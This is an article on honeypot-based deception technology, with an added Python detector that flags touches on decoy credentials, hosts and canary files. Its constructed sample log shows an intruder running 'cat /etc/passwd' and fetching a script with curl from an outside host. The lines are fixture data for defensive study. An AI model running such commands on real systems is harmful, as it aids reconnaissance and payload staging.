It’s every business owner’s worst nightmare. A criminal has broken into their server by exploiting a security flaw, and they’re seeing dollar signs as they prepare to exfiltrate their victim’s data for their own nefarious ends.
Except...they haven’t gotten in at all. Not really. They might think they’ve successfully broken into their target’s systems, but in actuality they’re trapped in a digital honeypot - the business owner is logging their every move and working to pin down where the intrusion is coming from.
“Deception technology gives defenders a rare advantage against attackers by doing something other forms of cybersecurity don’t,” writes Forbes contributor Dan Woods. “[They] provide early and accurate detection by laying a minefield of attractive decoy systems and content to trip up attackers. This is all done within the organization’s networks and serves as a high-fidelity warning system of attacks that have bypassed perimeter security controls.”
How a deception system works is quite simple. You create a series of decoys - fake credentials and documents, servers and network segments that host no real service, devices that aren’t actually in use, and so on. Since these are assets that no one within your organization would ever access for legitimate purposes, the moment someone attempts to interact with them you know there’s a security threat targeting your organization, either internal or external. That is what makes the signal high-fidelity: a real user has no reason to ever touch a decoy, so there is almost nothing to tune out.
Not only does this reduce dwell time and give attackers far less room to go undetected, it can also help you determine the nature of an attack. Better yet, if your decoys are instrumented to record what is done inside them (a high-interaction honeypot rather than a bare tripwire), you can observe an attacker mucking about in your decoy system, figure out what they’re trying to do, and deploy defenses to stymie their efforts. You aren’t just stopping their attack - you’re determining what the attack is, and potentially even figuring out its origin.
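To make the two preceding paragraphs concrete, here is an added example (not code from the original article) of the detection side of a deception system: a small Python module that holds an inventory of decoys and scans log lines for any touch on them. The decoy usernames, IP addresses and file path are hypothetical, the sshd lines follow the real OpenSSH format, and the `decoy[...]` lines are a constructed audit format standing in for whatever the honeypot software actually emits. Every log line is constructed for illustration.

```python
"""
Decoy-touch detector: added example, not code from the original article.
Decoy names, IPs, paths and all log lines below are constructed.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

# Decoy inventory (hypothetical values). Nothing legitimate ever references
# these, so any appearance in telemetry is a high-fidelity signal.
DECOY_USERS = {"svc_backup_legacy", "oracle_admin"}   # planted in a fake credentials file
DECOY_HOSTS = {"10.20.0.250", "10.20.0.251"}          # answer on the network, host nothing real
DECOY_PATHS = {"/var/backups/payroll_2019.xlsx"}      # canary file no job ever reads

# OpenSSH sshd auth outcomes ("Accepted publickey for X from IP", "Failed password for [invalid user] X from IP").
SSHD_RE = re.compile(
    r"sshd\[\d+\]: (?P<outcome>Accepted|Failed) \w+ for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)
# Constructed audit format emitted by the decoy host itself (commands run, files opened).
DECOY_RE = re.compile(
    r"decoy\[(?P<host>\d+\.\d+\.\d+\.\d+)\] session=(?P<session>\w+) "
    r"src=(?P<src>\d+\.\d+\.\d+\.\d+) (?P<kind>cmd|open)=(?P<detail>.+)"
)


@dataclass
class Alert:
    reason: str
    src: str
    detail: str


@dataclass
class Report:
    alerts: list = field(default_factory=list)
    activity: dict = field(default_factory=dict)  # src -> Counter of commands run inside decoys


def analyze(lines):
    """Alert on every decoy touch and tally what each source did once inside a decoy."""
    report = Report()
    for line in lines:
        m = SSHD_RE.search(line)
        if m:
            # Ordinary users failing a password is noise; a decoy username is not.
            if m["user"] in DECOY_USERS:
                report.alerts.append(Alert(
                    f"honeytoken credential used ({m['outcome'].lower()})", m["src"], m["user"]))
            continue
        m = DECOY_RE.search(line)
        if m and m["host"] in DECOY_HOSTS:
            if m["kind"] == "open" and m["detail"] in DECOY_PATHS:
                reason = "canary file opened"
            else:
                reason = f"{m['kind']} on decoy host"
            report.alerts.append(Alert(reason, m["src"], m["detail"]))
            if m["kind"] == "cmd":
                # The first token of each command is enough to profile intent (recon, exfil, staging).
                report.activity.setdefault(m["src"], Counter())[m["detail"].split()[0]] += 1
    return report


# Constructed sample log: two legitimate logins, then one intruder who uses the planted
# credential against the bastion and moves on to the decoy host.
SAMPLE_LOG = [
    "Mar  3 02:14:07 bastion sshd[4121]: Accepted publickey for alice from 10.1.4.22 port 51022 ssh2",
    "Mar  3 02:14:09 bastion sshd[4130]: Failed password for bob from 10.1.4.23 port 51030 ssh2",
    "Mar  3 02:15:44 bastion sshd[4177]: Failed password for invalid user svc_backup_legacy from 198.51.100.17 port 40112 ssh2",
    "Mar  3 02:16:02 decoy[10.20.0.250] session=a1 src=198.51.100.17 cmd=whoami",
    "Mar  3 02:16:05 decoy[10.20.0.250] session=a1 src=198.51.100.17 cmd=cat /etc/passwd",
    "Mar  3 02:16:20 decoy[10.20.0.250] session=a1 src=198.51.100.17 open=/var/backups/payroll_2019.xlsx",
    "Mar  3 02:16:31 decoy[10.20.0.250] session=a1 src=198.51.100.17 cmd=curl -s http://203.0.113.9/x.sh",
]

if __name__ == "__main__":
    r = analyze(SAMPLE_LOG)
    for a in r.alerts:
        print(f"ALERT {a.reason}: {a.src} -> {a.detail}")
    for src, tally in r.activity.items():
        print(f"{src} ran: {dict(tally)}")
```

Alice and Bob generate nothing, which is the point: the rule has no threshold to tune. The one address that used the planted credential also appears in the decoy host's command log, so the same report both raises the alarm and shows what the intruder was after (account enumeration, the payroll canary, and a download from an outside host).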
Sounds pretty great, right?
Here’s the bad news. Implementing a convincing deception system is anything but easy. Digital thieves are clever - if there’s something even a little off about the server they’re accessing (a hostname that doesn’t match your naming scheme, a patch level or software version nothing else on the network runs, a file server with no traffic and no recently modified files), they’ll probably go elsewhere, or at the very least attempt to track down your actual systems. For that reason, your decoys must look and behave like your real assets.
More importantly, the deception must cover your organization’s entire attack surface. If you’ve got IoT endpoints, you’ll need decoys for them. Ditto for smartphones. Machine learning can simplify this process to an extent, but it’ll still require a human touch (and regular updates) to keep things convincing.
It’s a little disheartening, really - in the eternal war for cybersecurity, criminals always seem to have the upper hand. Clever use of deception technology upsets that balance, though. It can work wonders for your security posture, and give your business a fighting chance against all but the most sophisticated attackers.